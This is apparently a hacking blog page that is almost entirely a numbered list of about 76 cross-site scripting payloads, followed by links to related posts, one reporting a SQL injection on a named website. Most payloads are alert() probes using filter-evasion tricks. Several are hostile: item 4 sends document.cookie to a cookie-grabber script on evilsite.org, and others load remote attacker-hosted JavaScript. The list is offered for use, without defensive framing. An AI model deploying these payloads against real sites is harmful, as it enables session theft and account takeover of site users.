1. <script>alert(1);</script>
    2. 
	
  2. <script>alert('XSS');</script>
    3. 
	
  3. <script src="http://www.evilsite.org/cookiegrabber.php"></script>
    4. 
	
  4. <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
    5. 
	
  5. <scr<script>ipt>alert('XSS');</scr</script>ipt>
    6. 
	
  6. <script>alert(String.fromCharCode(88,83,83))</script>
    7. 
	
  7. <img src=foo.png onerror=alert(/xssed/) />
    8. 
	
  8. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
    9. 
	
  9. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
    10. 
	
  10. <marquee><script>alert('XSS')</script></marquee>
    11. 
	
  11. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
    12. 
	
  12. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
    13. 
	
  13. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
    14. 
	
  14. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
    15. 
	
  15. "><script>alert(0)</script>
    16. 
	
  16. <script src=http://yoursite.com/your_files.js></script>
    17. 
	
  17. </title><script>alert(/xss/)</script>
    18. 
	
  18. </textarea><script>alert(/xss/)</script>
    19. 
	
  19. <IMG LOWSRC=\"javascript:alert('XSS')\">
    20. 
	
  20. <IMG DYNSRC=\"javascript:alert('XSS')\">
    21. 
	
  21. <font style='color:expression(alert(document.cookie))'>
    22. 
	
  22. '); alert('XSS
    23. 
	
  23. <img src="javascript:alert('XSS')">
    24. 
	
  24. <script language="JavaScript">alert('XSS')</script>
    25. 
	
  25. [url=javascript:alert('XSS');]click me[/url]
    26. 
	
  26. <body onunload="javascript:alert('XSS');">
    27. 
	
  27. <body onLoad="alert('XSS');"
    28. 
	
  28. [color=red' onmouseover="alert('xss')"]mouse over[/color]
    29. 
	
  29. "/></a></><img src=1.gif onerror=alert(1)>
    30. 
	
  30. window.alert("Bonjour !");
    31. 
	
  31. <div style="x:expression((window.r==1)?'':eval('r=1;
    32. 
	
  32. alert(String.fromCharCode(88,83,83));'))">
    33. 
	
  33. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
    34. 
	
  34. "><script alert(String.fromCharCode(88,83,83))</script>
    35. 
	
  35. '>><marquee><h1>XSS</h1></marquee>
    36. 
	
  36. '">><script>alert('XSS')</script>
    37. 
	
  37. '">><marquee><h1>XSS</h1></marquee>
    38. 
	
  38. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
    39. 
	
  39. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
    40. 
	
  40. <script>var var = 1; alert(var)</script>
    41. 
	
  41. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
    42. 
	
  42. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
    43. 
	
  43. <IMG SRC='vbscript:msgbox(\"XSS\")'>
    44. 
	
  44. " onfocus=alert(document.domain) "> <"
    45. 
	
  45. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
    46. 
	
  46. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
    47. 
	
  47. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
    48. 
	
  48. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
    49. 
	
  49. <br size=\"&{alert('XSS')}\">
    50. 
	
  50. <scrscriptipt>alert(1)</scrscriptipt>
    51. 
	
  51. </br style=a:expression(alert())>
    52. 
	
  52. </script><script>alert(1)</script>
    53. 
	
  53. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
    54. 
	
  54. [color=red width=expression(alert(123))][color]
    55. 
	
  55. <BASE HREF="javascript:alert('XSS');//">
    56. 
	
  56. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
    57. 
	
  57. "></iframe><script>alert(123)</script>
    58. 
	
  58. <body onLoad="while(true) alert('XSS');">
    59. 
	
  59. '"></title><script>alert(1111)</script>
    60. 
	
  60. </textarea>'"><script>alert(document.cookie)</script>
    61. 
	
  61. '""><script language="JavaScript"> alert('X \nS \nS');</script>
    62. 
	
  62. </script></script><<<<script><>>>><<<script>alert(123)</script>
    63. 
	
  63. <html><noalert><noscript>(123)</noscript><script>(123)</script>
    64. 
	
  64. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
    65. 
	
  65. '></select><script>alert(123)</script>
    66. 
	
  66. '>"><script src = 'http://www.site.com/XSS.js'></script>
    67. 
	
  67. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
    68. 
	
  68. <SCRIPT>document.write("XSS");</SCRIPT>
    69. 
	
  69. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
    70. 
	
  70. ='><script>alert("xss")</script>
    71. 
	
  71. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
    72. 
	
  72. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
    73. 
	
  73. ">/PlanetCreator/><script>alert(document.cookie)</script><script   src="http://www.site.com/XSS.js"></script>
    74. 
	
  74.  ">/PlanetCreator/><script>alert(document.cookie)</script>
    75. 
	
  75. src="http://www.site.com/XSS.js">
    76. 
	
  76. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
    77.

Explore More

Winsock tutorial

Just a little something I have been writing on and off. It was originally meant to be a collaboration of two of my prior tutorials, however, I’m starting to find

Read More

EU Police learning hacking tricks. They are about to “Remote search” your PCs.

Law enforcement at European Union is working on ethical hacking proposal that will allow them to remotely access and monitor any PC without warrant. This is adopted after a decision

Read More

Critical Blind SQL Injection (vulnerability) in The Best Myanmar Website (burmeseclassic.com)

PlanetCreator has reported another critical Blind SQL Injection (vulnerability) on http://www.burmeseclassic.com/ This vulnerability has been alerted to :- Webmaster of BurmeseClassic Applications: ———— PlanetCreator’s_Universal_Advanced_Internet_Security_T00L System Time: ———— (UTC+08:00) Yangoon, Myanmar

Read More